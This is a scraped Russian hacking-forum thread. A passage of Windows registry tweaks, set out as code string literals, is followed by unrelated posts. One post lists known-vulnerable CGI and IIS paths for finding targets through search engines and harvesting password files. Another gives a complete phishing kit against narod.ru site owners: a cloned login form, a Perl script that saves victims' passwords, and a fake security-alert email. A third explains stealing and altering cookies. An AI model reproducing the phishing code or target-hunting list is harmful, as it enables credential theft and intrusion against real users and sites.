LFN Заблокирована' '1 LFN Допускается на серверах версии 3.12 и выше' '2 LFN Допускается на всех серверах, которые поддерживают LFN' '4. Выйдите из Regedit и перезагрузитесь.' 'Ключ: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\' + 'NWREDIR]' 'Параметр: SupportLFN' 'Тип: REG_DWORD' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение определяющих SAP для сетей NetWare' 'По умолчанию Windows посылает пакеты SAP, чтобы определить досту' + 'пные совместные файлы и принтеры, ' 'когда опция '#39'Файлы и принтеры это компьютера можно сделать общим' + 'и'#39' включена. Этот параметр' 'отключает ' 'пересылку данных пакетов.' 'В дополнение к изменению значения параметра '#39'Use_Sap'#39' Вам также ' + 'может потребоваться создать другой ' 'ключ и значение:' '[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcpServer\' + 'Parameters\Ndi\Params\Use_Sap] @="0"' 'Ключ: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NcpS' + 'erver\Parameters]' 'Параметр: Use_Sap' 'Тип: REG_SZ' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Как восстановить анимированную эмблему Internet Explorer' 'Когда Вы находитесь в Internet, используя Internet Explorer, вра' + 'щение эмблемы указывает, что он активен. ' 'Этот параметр системного реестра определяет эмблему которая буде' + 'т отображена.' 'Чтобы восстановить поведение анимированной эмблемы Internet Expl' + 'orer, удалите значения параметров ' '"BrandBitmap" и "SmBrandBitmap", которые находятся в указанном н' + 'иже ключе системного реестра.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\To' + 'olbar]' '' '----------------------------------------------------------------' + '----------------' '' 'Прерывание команд FTP для Internet Explorer' 'Когда Вы вводите команду FTP типа "FTP ftp.regedit.com" то запус' + 'кается IE 4.0 вместо основной DOS ' 'программы FTP.' 'Чтобы отключить такое поведение IE, используйте Regedit, для нах' + 'ождения ключа указанного ниже, и ' 'удалите ' 'параметр "ftp".' 'Для возвращения к такому поведению IE, создайте параметр "ftp" т' + 'ипа REG_SZ и установите значение ' 'равным "ftp://".' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVers' + 'ion\URL\Prefixes]' '' '----------------------------------------------------------------' + '----------------' '' 'Добавление фонового изображения для инструментальной панели Inte' + 'rnet Explorer' 'Хотите установить свое изображение на инструментальной панели In' + 'ternet Explorer? Это можно сделать с ' 'помощью настройки системного реестра.' '1. Откройте Regedit, и найдите ключ указанный ниже.' '2. Добавьте новый строковый параметр "BackBitmap", и установить ' + 'его значение равным пути и имени ' 'растрового файла, который желаете использовать (например "C:\WIN' + 'DOWS\CLOUDS.BMP")' '3. Выйдете из Regedit, и перезагрузите Internet Explorer.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\To' + 'olbar]' 'Параметр: BackBitmap' 'Тип: REG_SZ' '' '' '----------------------------------------------------------------' + '----------------' '' 'Изменение расположения файлов почты и новостей Outlook Express' 'Если Вы установили Windows на отдельном диске, и хотите, чтобы н' + 'а этот диск не производилась запись ' 'ненужных файлов, Вы можете изменить расположение файлов почты и ' + 'новостей, сохраняемых Outlook' 'Express на другой диск.' 'Установите значение ключа равным новому пути размещения папок Ou' + 'tlook: ' '[HKEY_CURRENT_USER\Software\Microsoft\Outlook Express\Store Root' + ']. Не забудьте переместить папки "Mail" ' 'и "News" из старого места в новое.' 'Ключ: [Мой компьютер]' 'Параметр: HKEY_CURRENT_USER\Software\Microsoft\Outlook Express' 'Тип: REG_SZ' '' '----------------------------------------------------------------' + '----------------' '' 'Скрытие значка Internet Explorer' 'Этот параметр скрывает значок "Internet Explorer" на Рабочем сто' + 'ле Windows.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoInternetIcon' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Остановка сообщения об ошибках при загрузке' 'Останавливает раздражающие сообщения Windows, уведомляющие Вас, ' + 'что устройство не функционирует ' 'при загрузке Windows NT.' 'Создайте параметр '#39'NoPopupsOnBoot'#39' типа REG_DWORD в ключе указан' + 'ном ниже (если он еще не ' 'существует). Установите его значение равным '#39'1'#39' для отключения п' + 'оявления всплывающих сообщений.' 'Ключ: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windo' + 'ws]' 'Параметр: NoPopupsOnBoot' 'Тип: REG_DWORD' 'Значение: 1 = отключено' '' '----------------------------------------------------------------' + '----------------' '' 'Изменение заголовка окна Internet Explorer' 'Используя этот ключ, Вы можете изменить заданный по умолчанию за' + 'головок окна "Microsoft Internet ' 'Explorer", на что ни будь вроде "Окно просмотра Internet Андрея ' + 'Зенченко".' 'Используя RegEdit, откройте ключ "HKEY_LOCAL_MACHINE\SOFTWARE\Mi' + 'crosoft\Internet Explorer\Main" ' 'создайте в нем новый строковый параметр под названием "Window Ti' + 'tle", установите его значение равным ' 'строке которую Вы хотели бы видеть в области заголовка. Для сбро' + 'са к значению по умолчанию, удалите' 'параметр "Window Title".' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\M' + 'ain]' 'Параметр: Window Title' 'Тип: REG_SZ' '' '----------------------------------------------------------------' + '----------------' '' 'Задержка при открытии рабочей станции (Windows NT)' 'Иногда происходит значительная задержка при входе пользователя и' + 'ли администратора в рабочую' 'станцию. ' 'Это происходит потому что, когда Вы открываете рабочую станцию, ' + 'Windows NT модифицирует список ' 'доменов, если время кэширования списка превышает две минуты (по ' + 'умолчанию). Этот временной предел ' 'может быть изменен.' '1. Откройте системный реестр, найдите ключ и параметр указанные ' + 'ниже, если они не существуют, то ' 'создайте их.' '2. Установите значение параметра '#39'DcacheMinInterval'#39' равным коли' + 'честву секунд блокировки кэша.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV' + 'ersion\Winlogon]' 'Параметр: DcacheMinInterval' 'Тип: REG_DWORD' 'Значение: 120-86400 (десятичное число) (выраженное в секундах)' '' '----------------------------------------------------------------' + '----------------' '' 'Желтый значок '#39'!'#39' на PCMCIA сетевом адаптере (Windows 9x)' 'При использовании PCMCIA сетевого адаптера под Windows 98 Вы не ' + 'смогли подключить компьютер к сети, ' 'и ' 'в Панели управления > Система появляется желтый значок восклицат' + 'ельного знака рядом с именем платы.' '1. Нажмите на Пуск>Выполнить...>' '2. Напечатайте "REGEDIT", и нажмите OK' '3. Перейдите в ключ [HKEY_LOCAL_MACHINE\System\CurrentControlSet' + '\Services\VxD\VCOMM]' '4. Дважды щелкните на параметре '#39'EnablePowerManagement'#39', установ' + 'ите его значение равным '#39'0'#39', ' 'основываясь на следующем:' '· если текущее значение '#39'0000 01 00 00 00'#39', изменение его на '#39'00' + '00 00 00 00 00'#39' (Полная версия).' '· если текущее значение '#39'0x00000001 (1)'#39', измените его на '#39'0x000' + '00000 (0)'#39' (Обновленная версия)' '5. Закройте Редактор системного реестра' '6. Перезагрузите Windows' 'Ключ: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\' + 'VCOMM]' 'Параметр: EnablePowerManagement' 'Значение: (0=отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Изменение заданного по умолчанию состояния клавиши NUMLOCK (Wind' + 'ows NT)' 'Клавиша NUMLOCK обычно включается прежде, чем пользователь загру' + 'зит компьютер, это может ' 'причинить' 'неудобства для людей с портативными компьютерами, которые не про' + 'веряют состояние клавиши NUMLOCK ' 'перед введением пароля. Заданное по умолчанию поведение может бы' + 'ть изменено с помощью этой ' 'установки.' '1. Откройте Ваш системный реестр, и найдите ключ указанный ниже.' '2. Установите значение параметра '#39'InitialKeyboardIndicators'#39' рав' + 'ным '#39'0'#39' для отключения, или равным '#39'2'#39' для ' 'включения.' 'Обратите внимание: Это изменение затронет всех пользователей, но' + ' значение может быть изменено только ' 'для текущего пользователя, таким же изменением ключа [HKEY_CURRE' + 'NT_USER\Control Panel\Keyboard].' 'Ключ: [HKEY_USERS\.DEFAULT\Control Panel\Keyboard]' 'Параметр: InitialKeyboardIndicators' 'Тип: REG_SZ' 'Значение: 0 = NUMLOCK отключена, 2 = NUMLOCK включена' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление программ перечисленных в блоке "Установка/Удаление прог' + 'рамм" (Windows 9x и NT)' 'Все Windows 9x или NT совместимые программы должны включать прог' + 'рамму Uninstall, иногда программа ' 'может удалиться, но запись в блоке "Установка/Удаление программ"' + ' остается. В этом ключе, Вы можете' 'удалить ненужные записи.' 'Используя Regedit ,откройте ключ указанный ниже. Под этим ключом' + ' будет ряд подключей, каждый из ' 'которых представляет установленную программу.' 'Чтобы увидеть какую программу, каждый из подключей представляет,' + ' откройте его и там должно быть, по ' 'крайней мере, два параметра '#39'DisplayName'#39' и '#39'UninstallString'#39'. '#39 + 'DisplayName'#39' это название, используемое в ' 'списке программ "Установка/Удаление", а '#39'UninstallString'#39' это пр' + 'ограмма, используемая для деинсталляции ' 'вышеназванной программы.' 'Чтобы удалить программу из списка, Вы можете просто удалить подк' + 'люч, представляющий эту программу.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVers' + 'ion\Uninstall]' '' '----------------------------------------------------------------' + '----------------' '' 'Обеспечение сетевого доступа к дискам CD-ROM (Windows NT)' 'Этот параметр определяет, являются ли данные на диске CD-ROM дос' + 'тупными для других пользователей. ' 'Он ' 'частично удовлетворяет требованиям защиты C2 для сменных средств' + '.' 'Диск CD-ROM по умолчанию предназначен для совместного использова' + 'ния в сети. Если значение этого ' 'параметра равно '#39'1'#39', то только текущий пользователь сможет обрат' + 'иться к диску CD-ROM. Это не позволит' 'администраторам и удаленным пользователям (и даже пользователям ' + 'одной рабочей станции) получить ' 'доступ к диску, во время использования текущим пользователем ком' + 'пьютера. Диск снова станет ' 'доступным, когда текущий пользователь выйдет из компьютера.' 'Значения параметра:' '· '#39'0'#39' = к компакт-дискам могут обращаться все администраторы в д' + 'омене.' '· '#39'1'#39' = к компакт-дискам в может обращаться только текущий польз' + 'ователь вошедший в компьютер.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV' + 'ersion\Winlogon]' 'Параметр: AllocateCDRoms' 'Тип: REG_SZ' 'Значение: (0 = включено, 1 = отключено)' '' '----------------------------------------------------------------' + '----------------' '' 'Обеспечение сетевого доступа к дисководам для гибких дискет (Win' + 'dows NT)' 'Этот параметр определяет, являются ли данные на гибком диске дос' + 'тупными для других пользователей. ' 'Он ' 'частично удовлетворяет требованиям защиты C2 для сменных средств' + '.' 'Гибкие диски по умолчанию предназначены для совместного использо' + 'вания в сети. Если значение этого' 'параметра равно '#39'1'#39', то только текущий пользователь сможет обращ' + 'аттиться к гибким дискам. Это не ' 'позволит администраторам и удаленным пользователям (и даже польз' + 'ователям одной рабочей станции) ' 'получить доступ к дискам, во время использования текущим пользов' + 'ателем компьютера. Диски снова ' 'станут доступным, когда текущий пользователь выйдет из компьютер' + 'а.' 'Значения параметра:' '· '#39'0'#39' = к гибким дискам могут обращаться все администраторы в до' + 'мене.' '· '#39'1'#39' = к гибким дискам может обращаться только текущий пользова' + 'тель вошедший в компьютер.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV' + 'ersion\Winlogon]' 'Параметр: AllocateFloppies' 'Тип: REG_SZ' 'Значение: (0 = включено, 1 = отключено)' '' '----------------------------------------------------------------' + '----------------' '' 'Требование алфавитно-цифрового пароля Windows (Windows 9x и NT)' 'Windows по умолчанию принимает любой пароль, кроме пустого. Этот' + ' параметр определяет, будет ли ' 'Windows ' 'требовать алфавитно-цифровой пароль, то есть пароль, созданный и' + 'з комбинации букв (A, B, C. ..) и чисел' '(1, ' '2, 3 ...).Ключ: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\C' + 'urrentVersion\Policies\Network]' 'Параметр: AlphanumPwds' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Управление автоматической перезагрузкой оболочки (Windows NT)' 'По умолчанию, если в интерфейсе пользователя Windows NT или в од' + 'ном из его компонентов происходит ' 'сбой, интерфейс перезагружается автоматически. Эта установка мож' + 'ет быть изменена так, чтобы Вы ' 'проделывали эту операцию вручную.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV' + 'ersion\Winlogon]' 'Параметр: AutoRestartShell' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Блокировка кэширования пароля (Windows 9x и NT)' 'Для дополнительной автоматизации Windows кэширует копию пароля п' + 'ользователей в локальной системе. ' 'Это ведет к угрозе защиты на некоторых системах. При отключении ' + 'кэширующего средства, пароль ' 'пользователя не запоминается на его компьютере. Включение этого ' + 'параметра также удаляет повторное ' 'поле ввода пароля Windows, и отключает возможность синхронизации' + ' сетевых паролей.' 'Ключ: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVers' + 'ion\Policies\Network]' 'Параметр: DisablePwdCaching' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение Редактора системного реестра (Windows 9x и NT)' 'Этот параметр не позволит пользователю запустить Regedit.exe или' + ' Regedt32.exe для изменения системного ' 'реестра.' 'Предупреждение: Будьте внимательны при изменении этого параметра' + ', и удостоверитесь, что Вы не ' 'блокируете свой системный реестр.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\System]' 'Параметр: DisableRegistryTools' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение Администратора задач (Windows NT)' 'Включает или отключает способность пользователя запускать Админи' + 'стратор задач, для наблюдения за' 'процессами, выполнением программ, а так же созданием изменений в' + ' приоритете или в состоянии ' 'индивидуальных процессов. (Этот параметр была добавлен в Сервисн' + 'ом пакете 2.)' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\System]' 'Параметр: DisableTaskMgr' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Управление свойством Автозапуска (Windows 9x и NT)' 'Определяет, включено ли свойство Автозапуска на любом из дисков,' + ' связанном с системой. Когда средства ' 'Автозапуска присутствуют на диске, то они срабатывают, при разре' + 'шенном свойстве Автозапуска.' 'Этот параметр содержит 32 бита. Нижние 26 битов представляют каж' + 'дый диск, исходя из того, что самый ' 'нижний бит, представляет диск A, а 26-ой бит, представляет диск ' + 'Z. Если бит равен 0, свойство ' 'автозапуска, ' 'включено на этом диске. Если бит равен 1, свойство автозапуска з' + 'аблокировано на этом диске.' 'Например, если значение этого параметра равно 0x8 (двоичное 1000' + '), автозапуск заблокирован на диске D. ' 'Обратите внимание, что значение 1 в бите, представляющем CD ROM,' + ' имеет приоритет над значением' 'параметра Autorun.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoDriveTypeAutoRun' 'Тип: REG_DWORD' '' '----------------------------------------------------------------' + '----------------' '' 'Предотвращение запуска основного хранителя экрана (Windows NT)' 'Windows NT имеет заданный по умолчанию хранитель экрана login.sc' + 'r, который запускается, даже если' 'хранитель экрана не был выбран. Это может создать угрозу защите,' + ' поскольку позволяет локальному ' 'пользователю заменить login.scr другой программой, связанной с с' + 'истемными привилегиями.' '1. Измените значение параметра '#39'ScreenSaveActive'#39' на '#39'0'#39', чтобы ' + 'отключить хранитель экрана.' '2. Выйдите из Regedit и перезагрузитесь.' 'Обратите внимание: Может использоваться альтернативный хранитель' + ' экрана. Ели Вы не используете ' 'отключение, измените значение '#39'SCRNSAVE.EXE'#39' в том же ключе, на ' + 'значение равное полному пути к ' 'хранителю экрана, который Вы желаете использовать. Что бы измене' + 'ния вступили в силу, требуется ' 'перезагрузка.' 'Ключ: [HKEY_USERS\.DEFAULT\Control Panel\Desktop]' 'Параметр: ScreenSaveActive' 'Тип: REG_SZ' 'Значение: (0 = отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '&
  18. v chate bivai, tamtakogo nasmotrishsja
  19. lytsheja bydy ycit kak gramotno eto delat, chem vi bydete tolko krichat chto vi samie krytie xackeri a ymnii chelovek mojet ispolzovat eto ne tolko dlja vzloma, a kak zashity, tak chto kajdii ishet svoi pyt razvitija
  20. Ключевые слова для поиска уязвимых веб-страниц -------------------------------------------------------------------------------- 1. Что мы ищем? Одна из уязвимостей веб-сайтов это открытые директории. Многие администраторы часто забывают поменять настройки выставленные сервером по умолчанию. Такие ошибки в обычно приводят к дефейсу веб-страницы. 2. Что дают нам открытые директории? Например, через дериктории cgi-bin или scripts можно исполнить любой скрипт на удаленной машине. Через директорию _vti_bin (сайт под управление FrontPage), через утилиту shtml.exe можно просмотреть любой файл на диске. А, например, в директории vti_pvt содержатся все пароли доступа к FrontPage Extension (файл service.pwd). Рассшифровать полученные пароли я думаю труда не составит. 3. Где искать? Это самый простой вопрос. Набираем www.google.com или любой другой поисковик вводим нужную фразу и вперед, остаеться только пересмотреть результаты пойска . Иногда это не простая задача. Например на запрос /ets/passwd yahoo выдал 102000 результатов. Но думаю для настоящего хакера это не проблема. 4. Список. А вот наконец и сам список: /cgi-bin/axs.cgi /cgi-bin/bash /cgi-bin/bb-hist.sh /cgi-bin/bigconf.cgi /cgi-bin/bnbform /cgi-bin/bnbform.cgi /cgi-bin/cachemgr.cgi /cgi-bin/calendar /cgi-bin/campas /cgi-bin/carbo.dll /cgi-bin/cgimail.exe /cgi-bin/Cgitest.exe /cgi-bin/cgiwrap /cgi-bin/classified.cgi /cgi-bin/classifieds /cgi-bin/classifieds.cgi /cgi-bin/Count.cgi /cgi-bin/csh /cgi-bin/date /cgi-bin/day5datacopier.cgi /cgi-bin/day5notifier /cgi-bin/dbmlparser.exe /cgi-bin/download.cgi /cgi-bin/dumpenv.pl /cgi-bin/edit.pl /cgi-bin/environ.cgi /cgi-bin/excite /cgi-bin/faxsurvey /cgi-bin/faxsurvey /cgi-bin/filemail /cgi-bin/filemail.pl /cgi-bin/files.pl /cgi-bin/finger /cgi-bin/finger.cgi /cgi-bin/finger.pl /cgi-bin/flexform /cgi-bin/flexform.cgi /cgi-bin/FormHandler.cgi /cgi-bin/formmail.pl /cgi-bin/fortune /cgi-bin/fpexplorer.exe /cgi-bin/get32.exe\|dir /cgi-bin/glimpse /cgi-bin/guestbook.cgi /cgi-bin/guestbook.pl /cgi-bin/GW5 /cgi-bin/GWWEB.EXE /cgi-bin/handler /cgi-bin/handler.cgi /cgi-bin/htmlscript /cgi-bin/htmlscript /cgi-bin/info2www /cgi-bin/input.bat /cgi-bin/input2.bat /cgi-bin/jj /cgi-bin/ksh /cgi-bin/lwgate /cgi-bin/LWGate.cgi /cgi-bin/lwgate.cgi /cgi-bin/MachineInfo /cgi-bin/mail /cgi-bin/maillist.pl /cgi-bin/man.sh /cgi-bin/mlog.phtml /cgi-bin/mylog.phtml /cgi-bin/nlog-smb.pl /cgi-bin/nph-error.pl /cgi-bin/nph-publish /cgi-bin/nph-test-cgi /cgi-bin/passwd /cgi-bin/passwd.txt /cgi-bin/password /cgi-bin/password.txt /cgi-bin/perl /cgi-bin/perl.exe /cgi-bin/perlshop.cgi /cgi-bin/pfdispaly.cgi /cgi-bin/phf /cgi-bin/phf.pp /cgi-bin/php /cgi-bin/php.cgi /cgi-bin/phpscan /cgi-bin/post-query /cgi-bin/ppdscgi.exe /cgi-bin/query /cgi-bin/redirect /cgi-bin/responder.cgi /cgi-bin/rguest.exe /cgi-bin/rksh /cgi-bin/rsh /cgi-bin/rwwwshell.pl /cgi-bin/sam._ /cgi-bin/search.cgi /cgi-bin/search97.vts /cgi-bin/sendform.cgi /cgi-bin/sh /cgi-bin/snorkerz.bat /cgi-bin/snorkerz.cmd /cgi-bin/status.cgi /cgi-bin/survey /cgi-bin/survey.cgi /cgi-bin/tcsh /cgi-bin/test.bat /cgi-bin/test-cgi /cgi-bin/test-cgi.tcl /cgi-bin/test-env /cgi-bin/textcounter.pl /cgi-bin/tst.bat /cgi-bin/tst.bat\|dir /cgi-bin/unlg1.1 /cgi-bin/upload.pl /cgi-bin/uptime /cgi-bin/view-source /cgi-bin/visadmin.exe /cgi-bin/visitor.exe /cgi-bin/w3-msql /cgi-bin/w3-sql /cgi-bin/w3tvars.pm /cgi-bin/wais.pl /cgi-bin/webdist.cgi /cgi-bin/webgais /cgi-bin/webmap.cgi /cgi-bin/websendmail /cgi-bin/wguest.exe /cgi-bin/whois_raw.cgi /cgi-bin/wrap /cgi-bin/wwwadmin.pl /cgi-bin/wwwboard.pl /cgi-bin/www-sql /cgi-bin/zsh /cgi-dos/args.bat /cgi-dos/args.cmd /cgi-shl/win-c-sample.exe /cgi-win/uploader.exe /cool-logs/mlog.html /cool-logs/mylog.html /database.nsf /database.nsf /domcfg.nsf /domlog.nsf /hosts.dat /iisadmpwd/achg.htr /IISADMPWD/achg.htr /iisadmpwd/aexp.htr /iisadmpwd/aexp2.htr /iisadmpwd/aexp2b.htr /iisadmpwd/aexp3.htr /iisadmpwd/aexp4.htr /iisadmpwd/aexp4b.htr /iisadmpwd/anot.htr /iisadmpwd/anot3.htr /iissamples/exair/howitworks/codebrws.asp /iissamples/sdk/asp/docs/codebrws.asp /log.nsf /manage/cgi/cgiproc /msadc/msadcs.dll /msadc/samples/adctest.asp /msadc/Samples/SELECTOR/codebrws.cfm /msadc/Samples/SELECTOR/showcode.asp /msads/samples/selector/showcode.asp /names.nsf /names.nsf /passwd /passwd.txt /password /password.txt /publisher/ /samples/search/queryhit.htm /scripts/CGImail.exe /scripts/convert.bas /scripts/counter.exe /scripts/cpshost.dll /scripts/fpcount.exe /scripts/iisadmin/bdir.htr /scripts/iisadmin/ism.dll /scripts/iisadmin/tools/ctss.idc /scripts/iisadmin/tools/getdrvrs.exe /scripts/iisadmin/tools/mkilog.exe /scripts/issadmin/bdir.htr /scripts/perl /scripts/postinfo.asp /scripts/proxy/w3proxy.dll /scripts/samples/ctguestb.idc /scripts/samples/details.idc /scripts/samples/search/webhits.exe /scripts/tools/dsnform.exe /scripts/tools/getdrvrs.exe /scripts/tools/getdrvs.exe /scripts/tools/newdsn.exe /scripts/upload.asp /scripts/uploadn.asp /scripts/uploadx.asp /search /search97.vts /secure/.htaccess /secure/.wwwacl /session/adminlogin /showfile.asp /smdata.dat /ssi/envout.bat /today.nsf /tree.dat /WebSTAR /ws_ftp.ini /wwwboard/passwd.txt Удачной рыбалки
  21. Взлом на уровне карапуза (как сломать сайты на narod.ru и других бесплатных хостингах) -------------------------------------------------------------------------------- Вот сидел я и решил всё таки написать. Основа статьи это социальная инженерия, о которой уже было написано не мало. Не буду повторяться. Этот трюк можно провести со всеми новичками в сети Интернет. А рассматривать мы его будем уже на «банальном» хостинге narod.ru.(Повторюсь: его можно проделать на любом бесплатном хостинге, да даже и на платном моно попробовать Начнём для проведения нижеописанных действий вам понадобятся: 1. Мозги 2. Руки 3. Хостинг с поддержкой CGI 4. Небольшое знание HTML И так ищем жертву… У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа [email protected] Теперь нагло сдираем face народа Подправляем его, как надо, вставляем туда форму: <form action="write.cgi" method="post"> <input name="name" value=".narod.ru"><br> <input type="password" length="20" name="pass"><br> <input type="submit" value="подтвердить"> </form> Ещё надо написать write.cgi: &GetFormInput; $name=$field{'name'}; $pass=$field{'pass'}; sub GetFormInput { (*fval) = @_ if @_ ; local ($buf); if ($ENV{'REQUEST_METHOD'} eq 'POST') { read(STDIN,$buf,$ENV{'CONTENT_LENGTH'}); } else { $buf=$ENV{'QUERY_STRING'}; } if ($buf eq "") { return 0 ; } else { @fval=split(/&/,$buf); foreach $i (0 .. $#fval){ ($name,$val)=split (/=/,$fval[$i],2); $val=~tr/+/ /; $val=~ s/%(..)/pack("c",hex($1))/ge; $name=~tr/+/ /; $name=~ s/%(..)/pack("c",hex($1))/ge; if (!defined($field{$name})) { $field{$name}=$val; } else { $field{$name} .= ",$val"; } } } return 1; } open (OUTFILE, ">>pass.txt"); print OUTFILE "$name"; print OUTFILE "\n$pass"; print OUTFILE "\n=======END=======\n\n"; close (OUTFILE); print "Location: http://your_redirect_URL\n" ; Последняя строчка это перенаправление. Лучше послать на главную страницу народа. Всё наш сайт мы подготовили. Теперь пишем этому "карапузу" (прим. Eraser'a : телепузу =)) письмо с анонимного мыла от [email protected] вида: "Здравствуйте ваш сайт пытались взломать и вам срочно не позже чем через 96 часов надо пройти повторную авторизацию. Идите по ссылке(ага вот тута он и отдаст нам пароль) а ссылочка, то вы скажите видно будет, что не народовская... А я скажу вам нифига... А зачем нам nslookup? Вот так вот. короче ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html . Усё готово.. теперь токо надо ждать . Дополнение: В доставание пароля вам поможет ваша фантазия при написание письма лопуху...
  22. Cookie: Зачем Cookie нужен? Взлом через Cookie -------------------------------------------------------------------------------- Зачем Cookie нужен? Дело в том, что HTTP-протокол - одноразовый, если так можно выразиться. Т.е. каждый раз заходя на страничку, пользователь начинает сначала, что бы он не вводил, и какие изменения бы не делал. Cookie помогает создать иллюзию, что пользователя помнят на сайте. Пользователю не нужно вводить сотню раз одну и ту же информацию от странички к страничке, и даже от сессии к сессии, она хранится у него на диске. К удобству можно отнести еще и то, что эту информацию пользователь всегда сможет сменить у себя на диске "на лету". В Cookie также могут храниться другие разнообразные данные. Например, количество посещений какой-то страницы, время посещений. С помощью cookie не составляет труда сделать маленький органайзер или корзину в виртуальном магазине. Cookie многие не любят из-за ее небезопасности. Многие аналитики говорят, что это не проблема, и ничего плохого с помощью данной технологии сделать нельзя. Я с этим глубоко не согласен, если кто-то может читать информацию из файла(ов) cookie, то это уже небезопасно. Приведу чисто теоретические примеры, которые, при желании, не трудно воплотить в реальность. 1. Допустим, пользователь зашел на почтовый сайт, заполнил форму с login'ом и паролем, которые записались в cookie, пускай даже через Secure Socket Level. Взломщик написал письмо пользователю в формате HTML с параметрами чтения cookie с паролями. Прочитав cookie, HTML-файл или запрашивает у пользователя разрешение отослать информацию взломщику, где пользователя можно обмануть ложной надписью а ля "Ошибки в сценариях Javascript!". Даже довольно опытный пользователь не задумываясь нажмет OK, после чего login и пароль отошлется взломщику. Или взломщик может добавить 0-ой фрейм, где будет временно содержаться информация из cookie, которая при ответе на письмо, будет вставляться в конец письма. Все это нетрудно сделать с помощью FORM и Javascript. 2. Пример с виртуальным магазином. Допустим, мы имеем гипотетический магазин shop.provider.com. Совершая покупки в данном магазине, пользователь хранит информацию в cookie. Параллельно или до захода в магазин, пользователь зашел на гипотетическую страницу взломщика hacker.provider.com, где изменялись настройки cookie виртуального магазина. Взломщик может изменить количество покупок, имя, адрес, и все то, что хранится в данном cookie. Я думаю, вам бы не понравилось, если к вашим покупкам прибавили пару мониторов или отвезли ваши покупки не тому пользователю. Сделать это довольно просто, если иметь страничку в домене магазина второго или третьего уровня. Примеры:. Итак, для пользователя технология cookie представляет собой несколько файлов в папке %WINDOWS%\Cookies (по умолчанию в Internet Explorer), либо всего один файл cookie.txt (если это Netscape Navigator и другие броузеры). Сайты периодически добавляют информацию в cookie и ее же забирают. Естественно, в спецификациях Cookie предусмотрены некоторые элементы защиты. Всего Cookies может быть не больше 300. Каждый Cookie не может быть больше 4kb. С одного домена второго уровня (плюс подуровни) не может быть получено больше 20 Cookies. Информация из Cookie одного домена второго уровня (плюс подуровни) не может быть прочитана другими доменами. Если документ кэшируется, то информация о cookie не кэшируется. Информация в\из Cookie может передавать с помощью протокола SSL. Если лимит исчерпывается, первые записи удаляются. Если Cookie становится больше 4kb, первые байты вырезаются. Формат Cookie. Полную спецификацию на английском можно найти на http://www.netscape.com/newsref/std/cookie_spec.html. В моей статье только сокращенное описание. Информация в Cookie задается принципом ИМЯ=ЗНАЧЕНИЕ. В одном документе может содержаться несколько Cookies (не больше 20). Минимальное описание поля Cookie выглядит так: Set-Cookie: NAME=VALUE; Максимальное выглядит так: Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure NAME=VALUE - NAME - Имя Cookie, VALUE - Значение. Можно менять как NAME, так и VALUE. Используются любые символы, кроме символа переноса строки, двоеточия, запятой и пробела. Пример: Имя=Вася expires=DATE - Дата окончания действия Cookie. Менять только DATE. Вид такой: "expires=День, Число-Ден-ГГГГ ЧЧ:ММ:СС GMT". Если expires не обозначен, Cookie хранится до закрытия окна броузера. Пример: expires=Fri, 14-Sep-2005 13:13:13 GMT domain=DOMAIN_NAME - домен на котором действителен Cookie. Вид такой: "domain=domain.com". Cookie будет действителен как для www.domain.com, так и для myname.domain.com. В зоне RU и других локальных зонах не работает. Используется только для COM, EDU, NET, ORG, GOV, MIL и INT. Если domain не обозначен, используется доменное имя сервера с Cookie. Пример1: domain=mamapapa.com Пример2: domain=gazzzeta.da.ru path=PATH - Указывает имена докментов, для которых действительно значение Cookie. Вид такой: "path=/word". Cookie будет отсылаться в директориях /word, /word2000 и файлов в текущей директории с именами word.htm, wordchampion.html. Для применения Cookie ко всему серверу указывается корневой каталог сервера /. Если path не указан, Cookie распространяется только на текущую директорию. Пример1: path=/gazzzeta Пример2: path=/ secure - Если указан, при 